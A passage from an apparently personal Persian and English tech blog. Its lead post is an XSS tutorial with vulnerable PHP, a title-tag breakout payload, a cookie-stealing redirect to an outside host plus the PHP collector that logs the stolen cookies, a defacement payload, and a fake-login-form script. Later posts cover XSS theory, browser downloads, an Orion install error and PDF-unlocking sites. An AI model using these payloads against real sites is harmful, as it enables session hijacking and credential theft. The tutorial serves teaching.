ارائه چند مثال از حملات XSS

Sajjad Aghapour — Sat, 10 Sep 2011 17:37:22 +0000

مثال 1 : مثال بسیار ساده ای که برای درک مفهوم حملات نوع XSS می توان زد به این شکل خواهد بود.

صفحه ای به نام index.html داریم که به صورت زیر است :

this is a test page for sending form data

صفحه xss_test.php بدین صورت خواهید بود :

$name = (isset($_REQUEST['name'])) ? $_REQUEST['name'] : ”;

$family = (isset($_REQUEST['name'])) ? $_REQUEST['family'] : ”;

$message = (isset($_REQUEST['name'])) ? $_REQUEST['message'] : ”;

echo “Thank you $name $family for sending the message.
”;

echo “Your message is : $message”;

قبل از اینکه این برنامه را با استفاده از acunetix اسکن کنیم بگذارید تحلیلی رو کدهای نوشته شده کرده و نفوذپذیری آن را بررسی کنیم. فرض کنید یک هکر در حال پر کردن این فرم باشد. همانطور که قبلا گفته شد، این نوع حملات در سمت کاربر انجام می شود پس با استفاده از زبان های برنامه نویسی سمت کاربر باید این اسکریپت ها نوشته شوند لذا هکر می تواند با استفاده از زبان JavaScript فیلدهای مورد نظر را پرکند تا بتواند به اطلاعات کاربر دسترسی پیدا کند. و چون هیچ اعتبارسنجی انجام نمی شود لذا هر کدی که کاربر به صفحه xss_test.php بفرستد اجرا خواهد شد. مقدار فیلدها را مانند شکل زیر پر کرده و دکمه submit را بزنید :

همانطور که می بینید ما یک script را به صفحه xss_test.php می فرستیم و با توجه به ساختار کد نویسی ما این کد نیز اجرا خواهد شد. نتیجه اجرای آن نیز در صفحه xss_test.php به شکل زیر خواهد بود.

اگر کمی دقت کنید می بینید وقتی کد های PHP کامپایل می شوند اسکریپتی که ما در فیلد message نوشتیم در تگ body جایگزین می شوند و مانند هر کد جاوا اسکرپتی که ممکن است در صفحات وجود داشته باشند اجرا می شود. برای درک بیشتر این مطلب وقتی در صفحه xss_test.php هستید روی دکمه OK کلیک کرده و سپس کدهای HTML آن را مشاهده کنید. برای این کار روی صفحه راست کلیک کرده و View Page Source را بزنید. کدها به صورت زیر خواهد بود :

Thank you sajjad aghapour for sending the message.
Your message is : Hi

اگر این برنامه را با استفاده از acunetix نیز اسکن کنیم همین نتایج برای ما نشان داده می شود. تصویر زیر گویای این مطلب خواهد بود :

مثال 2 : شاید خیلی از مواقع جاهایی وجود داشته باشد که از امن بودن کد نوشته شده مطمئن باشید، اما در این مواقع نیز باید کد خود را مورد بازبینی قرار دهید. مثالی که زده شد استفاده از این اسکریپت ها به صورت کلی و محض بود. اما با توجه به مثال زیر می توانید به عمق بیشتری از کار پی ببرید.

صفحه index.html داریم که به صورت زیر است :

محتویات صفحه xss_test.php بدین صورت خواهد بود :

</p> <p dir="LTR"><?php</p> <p dir="LTR"> echo $_REQUEST['title'];</p> <p dir="LTR">?></p> <p dir="LTR">

در صفحه test.php عنوان صفحه از ورودی گرفته می شود و بدون هیچ اعتبارسنجی به نمایش در می آید. شاید شما فکر کنید چون در تگ title وجود تگ script بی معنا خواهد بود لذا اعتبارسنجی ورودی نیز بی معنا خواهد بود. اما با کمی تامل متوجه خواهید شد که این کد نیز در معرض حمله است. برای درک اینکه چگونه این کد در معرض حمله قرار دارد این برنامه را با acunetix اسکن می کنیم. نتیجه به شکل زیر خواهد بود :

یعنی درخواستی که هکر می فرستد به این صورت است:

http://localhost:8080/security/xss/xss_test.php?title=11

مفهوم آن به این صورت است که هکر ابتدا تگ را با استفاده از می بندد و سپس اقدام به اجرای اسکریپت خود می کند. یعنی در اصل کد شما به این صورت در خواهد آمد :

در اینجا دو بار تگ بسته شده است که این برای هکر مهم نیست. این کار یقینا استایل صفحه شما را به هم خواهد ریخت و اگر شما کاربر یک سایت هستید با توجه به این موضوع می توانید اطلاعاتی که هکر از شما ربوده است را تغییر داده و مانع از دسترسی بعدی هکر به آنها شوید. برای مثال اگر نام کاربری و کلمه عبور شما در معرض دید هکر قرار گرفته است می توانید آن را عوض کرده تا از دسترسی هکر به اکانت خود جلوگیری کنید.</p> <p dir="RTL">اگر شما از افزونه NoScript نیز در مرورگر خود استفاده کنید این حمله را شناسایی و بلاک خواهد کرد و پیام آن بدین شکل خواهد بود :</p> <div align="right"> <table dir="rtl" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top" width="638"> <p dir="LTR">[NoScript XSS] Sanitized suspicious request. Original URL [http://localhost:8080/security/xss/test.php?title=1%3C/title%3E1%3CScRiPt%20%3Eprompt(985812)%3C/ScRiPt%3E] requested from [chrome://browser/content/browser.xul]. Sanitized URL: [http://localhost:8080/security/xss/test.php?title=1%20%2Ftitle%3E1%20ScRiPt%20%3EPROMPT%20985812%20%20%2FScRiPt%3E#8975021026187294357].</p> </td> </tr> </tbody> </table> </div> <p dir="RTL">مثال 3 : اما پا را فراتر نهیم. تا بدین جا فقط کدهایی را بررسی کردیم که شاید از دید شما امنیت سایت را آنچنان به خطر نیاندازد. در حقیقت کدها طوری نوشته شده است که فقط مطلب فهمانده شود. اما اگر همین کد اطلاعات کوکی شما را به یک صفحه برای یک هکر بفرستد امنیت کاربر به خطر خواهد افتاد. اما نکته ای که در اینجا نیز می خواهیم به آن بپردازیم این است که هر اطلاعاتی که برای هکر ارسال می شود مفید نخواهد بود. در واقع اطلاعاتی مفید خواهد بود که با استفاده از آنها نوعی دسترسی برای هکر به سایت ایجاد کند. در این مثال قصد داریم به این موضوع بپردازیم.</p> <p dir="RTL">فرض کنید یک سیستم مدیریت محتوا داریم. در سایت امکانی وجود دارد که کاربر می تواند پیامی را برای مدیریت وبسایت ارسال کند. فرم طراحی شده در مثال یک را در نظر بگیرید. اطلاعات این فرم به سیستم مدیریت ارسال می شوند که فیلد message با داده های زیر پر می شود :</p> <div align="right"> <table dir="rtl" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top" width="638"> <p dir="LTR">document.location = “http://GoogleA5.Com/steal.php?cookie = “ + document.cookie;</p> </td> </tr> </tbody> </table> </div> <p dir="RTL">این کد به این صورت عمل خواهد کرد که اطلاعات مربوط به کوکی کاربر را به آدرس مربوطه ارسال می کند. در صفحه steal.php هکر طوری کد نویسی کرده است که اطلاعات ارسالی را گرفته و در جایی ذخیره می کند. برای مثال :</p> <div align="right"> <table dir="rtl" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top" width="638"> <?php<br /> $handle = fopen(“cookiejar.txt”, “a”);<br /> fputs($handle, “\n”.$_GET["cookie"].”\n”);<br /> fclose($handle);<br /> ?></p> <p dir="LTR"> </td> </tr> </tbody> </table> </div> <p dir="RTL">حال فرض کنید مدیر وبسایت این پیام را چک می کند. مطمئنا اطلاعات مربوط به کوکی مدیر وبسایت برای یک هکر مفید خواهد بود. لذا هکر می تواند از این اطلاعات برای دسترسی در سطح مدیریتی استفاده نماید.</p> <p dir="RTL">مثال 4 : اما سوء استفاده از این نوع حمله به اینجا نیز ختم نمی شود. هکر می تواند اسکریپت را طوری بنویسد که محتویات صفحه نمایش سایت را تغییر دهد که به این کار Deface گفته می شود. برای مثال :</p> <div align="right"> <table dir="rtl" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top" width="638"> <pre>xss_test.php?title=<script>document.body.innerHTML = "XSS Attack"</script></pre> </td> </tr> </tbody> </table> </div> <p dir="RTL">این نمونه ساده ای از Deface بود. هکر می تواند طبق صفحه ورود به سایت شما به همین شکل صفحه ای را طراحی کند که شامل فرمی از فیلدهایی برای وارد کردن نام کاربری و کلمه عبور باشد و action مربوط به این فرم صفحه ای باشد که در آنجا هکر این اطلاعات را گرفته و در جایی ذخیره می کند(در اصل هکر یک faked page طراحی کرده است و به شما نمایش می دهد). حال فرض کنید یک کاربری که سطح دسترسی بالایی هم به سایت دارد به این صفحه راهنمایی می شود و با وارد کردن نام کاربری و کلمه عبور خود انتظار دارد وارد سایت شود غافل از اینکه اطلاعات او به صفحه دیگری برای یک هکر ارسال شده است. برای مثال اسکرپتی که می توان به این صورت نوشت بدین صورت خواهد بود :</p> <div align="right"> <table dir="rtl" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top" width="638"> <p dir="LTR">function deface()</p> <p dir="LTR">{</p> <p dir="LTR"> var form = document.createElement(‘form’);</p> <p dir="LTR"> form.action = ‘test.php’;</p> <p dir="LTR"> form.method = ‘post’;</p> <p dir="LTR"> var input = document.createElement(‘input’);</p> <p dir="LTR"> input.type = ‘text’;</p> <p dir="LTR"> input.name = ‘username’;</p> <p dir="LTR"> form.appendChild(document.createTextNode(‘username : ‘));</p> <p dir="LTR"> form.appendChild(input);</p> <p dir="LTR"> form.appendChild(document.createElement(‘br’));</p> <p dir="LTR"> input = document.createElement(‘input’);</p> <p dir="LTR"> input.type = ‘text’;</p> <p dir="LTR"> input.name = ‘pass’;</p> <p dir="LTR"> form.appendChild(document.createTextNode(‘password : ‘));</p> <p dir="LTR"> form.appendChild(input);</p> <p dir="LTR"> form.appendChild(document.createElement(‘br’));</p> <p dir="LTR"> input = document.createElement(‘input’);</p> <p dir="LTR"> input.type = ‘submit’;</p> <p dir="LTR"> input.name = ‘submit’;</p> <p dir="LTR"> form.appendChild(input);</p> <p dir="LTR"> form.appendChild(document.createElement(‘br’));</p> <p dir="LTR"> document.body.innerHTML = ”;</p> <p dir="LTR"> document.body.appendChild(form);</p> <p dir="LTR">}</p> </td> </tr> </tbody> </table> </div> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/283/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/283/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/283/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/283/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/283/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/283/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/283/"></a> </article> <article> <h1>ایجاد اسکریپ در صفحات وب جهت حمله</h1> <p>Sajjad Aghapour — Sat, 10 Sep 2011 17:25:04 +0000</p> <p dir="RTL">همانظور که <a href="http://sajjadaghapour.wordpress.com/2011/09/10/%d8%ad%d9%85%d9%84%d8%a7%d8%aa-xss/">قبلا گفته شد</a> چون این کدها سمت کاربر اجرا می شوند پس منظور از اسکریپت کدهای PHP نیست، زیرا این کدها سمت سرور می باشند. در حالت کلی 5 تگ HTML برای گنجاندن این اسکریپت ها وجود دارد:</p> <ol> <li><script> : معمولا برای درج کدهای JavaScript یا VBScript استفاده می شود.</li> <li> : برای درج فایل هایی بر اساس کنترل هایی مثل Media Player، Flash و یا کامپوننت های ActiveX</li> <li><applet> : فقط برای Java Applet ها استفاده می شود. نکته ای که در مورد این تگ وجود دارد این است که در HTML 4.01 با توجه به وجود تگ این تگ از چشم افتاد و معنایی از منسوخ شدن به خود گرفت. اما باز هم کاربرد وسیع آن قابل توجه است. علی رغم این، در XHTML 1.0 نیز ساپورت نمی شود(برای اطلاعات بیشتر به http://www.w3.org/TR/xhtml1 میتوانید مراجعه کنید).</li> <li><ifram> : برای گنجاندن یک صفحه در صفحه ای دیگر است.</li> <li> : برای گنجاندن پلاگین ها در یک صفحه مورد استفاده قرار میگیرد که معمولا این پلاگین ها برای صدا و تصویر می باشند. این تگ نیز مانند <applet> در HTML 4.01 و XHTML 1.0 وجود ندارد اما به دلیل استفاده زیاد آن توسط مرورگرها ساپورت می شود.</li> </ol> <p dir="RTL">نکته قابل توجهی که باید به آن توجه کرد این است که اگر شما بخواهید عکسی را در سایت قرار دهید مجبور به استفاده از تگ خواهید بود که فرم خاصی از است، لذا ممکن است توسط آن کدهای مخربی در سایت گنجانده شود.</p> <p dir="RTL">کدهای مخربی که با استفاده از اسکریپت ها داخل یک برنامه تزریق می شوند تقریبا هر کاری را می توانند انجام دهند. برای مثال: کنترل از راه دور مرورگر(در صورت بروز حمله XSS ، مهاجم این امکان را می یابد تا اطلاعات دلخواهی را به جای اطلاعات حقیقی نمایش دهد و در واقع کنترل صفحه نمایش اصلی وب سایت را بدست گیرد)، افشای اطلاعات کوکی، تغییر لینک ها در یک صفحه(در واقع تغییر هر آبجکتی در یک صفحه)، انتقال صفحه به صفحه ای دیگر(آدرسی به آدرس دیگر)، یا به نمایش درآوردن صفحه ای جعلی که اطلاعات را جمع آوری و برای هکر ارسال می کند و یا اعمال دیگری از این دست.</p> <p dir="RTL">برای مشاهده لیست بلند بالایی از کدهای مخرب می توانید به آدرس http://ha.ckers.org/xss.html مراجعه کنید. این آدرس منابع خوبی در اختیار شما قرار می دهد که می توانید برای تست نرم افزار خود از آنها استفاده کنید. همچنین نگاهی اجمالی به آن نیز به شما در شناخت نفوذپذیری هایی از این نوع کمک خواهد کرد.</p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/280/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/280/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/280/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/280/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/280/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/280/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/280/"></a> </article> <article> <h1>حملات XSS</h1> <p>Sajjad Aghapour — Sat, 10 Sep 2011 17:21:55 +0000</p> <p dir="RTL">Cross Site Scripting یکی از انواع حملات تزریق کد است که اسکریپت های مخرب به سایت های ظاهرا قابل اعتماد تزریق می شوند. این نوع حملات وقتی اتفاق می افتند که یک هکر از برنامه های تحت وب برای ارسال کدهای مخرب استفاده میکنند. در حالت کلی این حملات از اسکریپت های سمت کاربر شروع و در همان سمت کاربر اجرا می شوند و نتایج نیز ممکن است برای هکر فرستاده شود. از اینرو این نوع حمله را حمله به کاربر می نامند. نقایصی که امکان این حمله را می دهند بسیار زیادند و هر جایی از یک برنامه که ورودی های کاربر را می گیرد و خروجی را بدون اینکه ورودی را اعتبارسنجی یا آن را کد کنند تولید می کنند ممکن است اتفاق بیافتد. مرورگرها راهی برای تشخیص این نوع حملات ندارند و این اسکریپت ها را اجرا خواهند کرد زیرا تصور می کنند که یک کد قابل اعتماد هستند. این کدها می توانند به کوکی ها و بسیاری از اطلاعات حساسی که توسط مرورگر نگهداری می شوند دسترسی داشته باشند. این کدها حتی محتوای صفحات وب را می توانند عوض کنند.</p> <p dir="RTL">اغلب کاربران تصور می کنند با داشتن آنتی ویروس، به روز نگاه داشتن سیستم عامل و مرورگر و استفاده از فایروال در مقابل تمامی خطرات ایمن هستند. اما این ابزارها در مقابله با حملات XSS موثر نیستند. برای همین به راحتی کاربران می توانند قربانی این نوع حمله شوند، حتی کاربران با دانش فنی بالا. کارشناسان توصیه می کنند که در انتخاب مرورگر اینترنتی خود دقت زیادی داشته باشید. به نظر می رسد که در حال حاضر مرورگر فایرفاکس بیشترین امنیت را برای مقابله با این حملات داشته باشد. نصب یک افزونه به نام NoScript در مرورگر فایرفاکس هم به کاربران کمک می کند تا در برابر این گونه حملات ایمنی بسیار بیشتری داشته باشند.</p> <p dir="RTL">تاکنون تعدادي از برجسته ترين نام‏هاي اينترنتي از قبيل گوگل، ياهو و MySpace، قرباني حملات XSS شده اند. علاوه بر اين ثابت شده که ده‏ها هزار سايت ديگر از جمله بانک‏ها و شرکت‏هاي ارائه کننده خدمات پزشکي و سلامتي نيز در معرض هجوم اين حملات قرار دارند.</p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/277/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/277/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/277/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/277/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/277/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/277/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/277/"></a> </article> <article> <h1>Download the latest version of top browsers</h1> <p>Sajjad Aghapour — Fri, 19 Aug 2011 08:47:34 +0000</p> <p>Nowadays, Firefox, Chrome and Internet Explorer are top browsers that people use(I prefer Firefox to the others). The following links are the latest version of these browsers for download…</p> <h2>Firefox 6.0 Final</h2> <ul> <li><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/win32/en-US/Firefox%20Setup%206.0.exe" target="_blank"><strong>Download Firefox 6.0 for Windows</strong><strong></strong><strong></strong></a><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/linux-i686/en-US/firefox-6.0.tar.bz2" target="_blank"><strong><br /> </strong></a></li> <li><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/linux-i686/en-US/firefox-6.0.tar.bz2" target="_blank"><strong>Download Firefox 6.0 for Linux</strong></a></li> <li><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/linux-x86_64/en-US/firefox-6.0.tar.bz2" target="_blank"><strong>Download Firefox 6.0 for Linux x64</strong><strong></strong></a><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/mac/en-US/Firefox%206.0.dmg" target="_blank"><strong><br /> </strong></a></li> <li><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/mac/en-US/Firefox%206.0.dmg" target="_blank"><strong>Download Firefox 6.0 for Mac</strong><strong></strong></a><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/win32/" target="_blank"><strong><br /> </strong></a></li> <li><a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/6.0/win32/" target="_blank"><strong>Download Firefox 6.0 – All Languages</strong></a></li> </ul> <h2>Chrome 13.0.782.112 Final</h2> <ul> <li><a href="http://dl.google.com/chrome/install/782.112/chrome_installer.exe" target="_blank"><strong><strong><strong>Download Google Chrome 13.0.782.112 Stable</strong></strong></strong></a></li> </ul> <h2>Internet Explorer 9.0.2 Final</h2> <ul> <li><a href="http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages" target="_blank"><strong>http://windows.microsoft.com/en-US/i…wide-languages</strong></a></li> </ul> <p>If you are a web developer, use can use from Firebug add-on for Firefox too:</p> <ul> <li><strong><a href="http://getfirebug.com/whatisfirebug" target="_blank">What is Firebug</a></strong></li> <li><strong><a href="http://getfirebug.com/releases/firebug/1.8/firebug-1.8.1.xpi" target="_blank">Download Firebug v.1.8.1</a></strong></li> </ul> <p> </p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/275/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/275/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/275/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/275/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/275/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/275/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/275/"></a> </article> <article> <h1>Orion installation problems</h1> <p>Sajjad Aghapour — Tue, 05 Jul 2011 09:36:46 +0000</p> <p>You may face with many problems when you want to install <a href="http://www.solarwinds.com/products/orion/" target="_blank">Orion</a>. These problems are caused by many reasons that you can remove them easily. for example I faced with the bellow error when I was trying to install it:</p> <blockquote><p>Launch of [msiexec.exe] [/i "C:ProgramData Application Data SolarWinds Installers SSCERuntime-ENU-x86.msi" /q /log "C:ProgramDataApplication DataSolarWindsSSCERuntime-ENU-x86.msi.log"] failed, returning exit code of [1603]</p></blockquote> <p>The main reason for this error is <strong>SSCERuntime</strong> that is for <strong>SQL Server Compact</strong> edition. If you faced with this error you have to remove SQL Server Compact from your computer.</p> <p>You may get many errors like this, the solution is that you should find the software that is installed on your computer and also is incompatible with Orion, then you can remove it and continue to install..</p> <p> </p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/268/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/268/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/268/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/268/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/268/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/268/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/268/"></a> </article> <article> <h1>Copy text from a dialog box</h1> <p>Sajjad Aghapour — Mon, 04 Jul 2011 15:35:13 +0000</p> <p>Hi</p> <p>If you faced with a dialog box and you wanted to copy its text to the clipboard, you can press “Ctrl + C” hotkey to copy its text when the dialog box is focused…</p> <p>Good luck!</p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/263/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/263/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/263/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/263/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/263/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/263/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/263/"></a> </article> <article> <h1>Brute Force and Dictionary attack</h1> <p>Sajjad Aghapour — Wed, 20 Apr 2011 16:55:47 +0000</p> <p style="text-align:left;" dir="ltr">I’ve supposed to select “Brute force vs. Dictionary attack” for this post. But I don’t want to compare them, instead, I want to introduce some links and websites that do this.</p> <p style="text-align:left;" dir="ltr">What is a Brute force attack?<br /> <a href="http://en.wikipedia.org/wiki/Brute_force_attack" target="_blank">http://en.wikipedia.org/wiki/Brute_force_attack </a></p> <p style="text-align:left;" dir="ltr">And what is a Dictionary attack?<br /> <a href="http://en.wikipedia.org/wiki/Dictionary_attack" target="_blank">http://en.wikipedia.org/wiki/Dictionary_attack </a></p> <p style="text-align:left;" dir="ltr">You can find the differences between these two ways for finding a password. But there are some authors that tell you more like the following link:</p> <p style="text-align:left;" dir="ltr"><a href="https://www.infosecisland.com/blogview/6131-Brute-Force-vs-Dictionary-Attacks.html">https://www.infosecisland.com/blogview/6131-Brute-Force-vs-Dictionary-Attacks.html</a></p> <p style="text-align:left;" dir="ltr">Introducing a worm : One of the worms that uses from Dictionary attack is <a href="http://en.wikipedia.org/wiki/Conficker" target="_blank">Conficker</a></p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/256/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/256/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/256/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/256/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/256/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/256/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/256/"></a> </article> <article> <h1>PDF Unlocker</h1> <p>Sajjad Aghapour — Sun, 10 Apr 2011 08:16:29 +0000</p> <p dir="ltr" align="left">There are some softwares that enable you to remove limitations from PDF files(whether Web Application or Windows Application) . if you can’t copy PDF text to clipboard or your PDF files have any other limitations, these softwares assist you to remove their security and protection…</p> <p dir="ltr" align="left">Some softwares;</p> <p dir="ltr" align="left"><a href="http://www.unlock-pdf.com" target="_blank">http://www.unlock-pdf.com</a></p> <p dir="ltr" align="left"><a href="http://www.ensode.net/pdf-crack.jsf" target="_blank">http://www.ensode.net/pdf-crack.jsf</a></p> <p dir="ltr" align="left"><a href="http://freeware-pdf-unlocker.en.softonic.com" target="_blank">http://freeware-pdf-unlocker.en.softonic.com</a></p> <p dir="ltr" align="left">You just have to go to google and search “pdf unlock” to give you many results. hah, what an easy way:D</p> <p dir="ltr" align="left">Good Luck!</p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/245/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/245/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/245/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/245/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/245/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/245/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/245/"></a> </article> <article> <h1>بهبود سرعت وبسایت با استفاده از mod_pagespeed</h1> <p>Sajjad Aghapour — Sun, 06 Mar 2011 12:00:55 +0000</p> <p>mod_pagespeed یک Apache module هستش که البته فقط بعضی از سرورها اون رو بصورت مستقیم پشتیبانی میکنند.<br /> فقط خواستم یک اشاره ای به این ماژول داشته باشم. کل مطلب رو میتونید از لینک زیر مشاهده کنید:<br /> <a href="http://codesamplez.com/web-server/mod_pagespeed-htaccess-tutorial" target="_blank"> http://codesamplez.com/web-server/mod_pagespeed-htaccess-tutorial</a></p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/239/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/239/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/239/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/239/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/239/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/239/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/239/"></a> </article> <article> <h1>افزایش زمان Load صفحه</h1> <p>Sajjad Aghapour — Fri, 06 Aug 2010 20:27:39 +0000</p> <p>یکی از دلایلی که در سرعت کند Loading صفحه موثر است حجم بالای صفحه است که شما میتوانید با کاهش حجم آن و کاهش Rendering سرعت Load صفحه تان را بالا ببرید.<br /> شاید برایتان جالب هم باشد که بدانید علت کند بودن صفحه تان چیست.برای این منظور میتوانید از ابزارهای زیر استفاده کنید:</p> <ul> <li><a href="http://ajax.dynatrace.com/" target="_blank">dynaTrace</a> برای IE</li> <li><a href="http://developer.yahoo.com/yslow/" target="_blank">YSlow </a>برای Firefox</li> <li><a href="http://code.google.com/webtoolkit/speedtracer/" target="_blank">SpeedTracer </a>برای Chrome</li> </ul> <p>ابزارهایی که می توانید برای بهینه سازی یک صفحه به کار ببرید:</p> <p><strong>بهینه سازی HTML:</strong><br /> <a href="http://www.alentum.com/ahc/" target="_blank">Alentum Software </a>ابزاری برای این کار به شما اراده خواهد داد</p> <p><strong>بهینه سازی CSS:</strong><br /> بهتر هست کلیه style ها را در یک فایل جمع آوری کنید و در صفحه HTML یک Reference به آن داشته باشید.برای بهینه سازی این فایل CSS هم میتوانید از این<a href="http://www.cssdrive.com/index.php/main/csscompressor/" target="_blank">ابزار آنلاین</a> استفاده کنید</p> <p><strong>بهینه سازی Javascript:</strong><br /> برای این کار هم میتوانید از ابزارهای زیر استفاده کنید:<br /> <a href="http://jscompress.com/" target="_blank">jsCompress</a><br /> <a href="http://developer.yahoo.com/yui/compressor/" target="_blank">YUI compressor</a><br /> <a href="http://www.dynamic-tools.net/toolbox/javascript_compressor/" target="_blank">Dynamic tools JavaScript compressor</a></p> <p><strong>استفاده از Div به جای Table:</strong><br /> اساس وجود تگ Table برای استفاده Tabular است، اما بعضی از طراحان برای طراحی صفحات از این تگ به جای Div استفاده میکنن که این کار در Rendering و همچنین Search Engines Indexing تاثیر زیادی خواهد گذاشت.بهتر است که از Div برای این کار استفاده کنید و از Table در جای 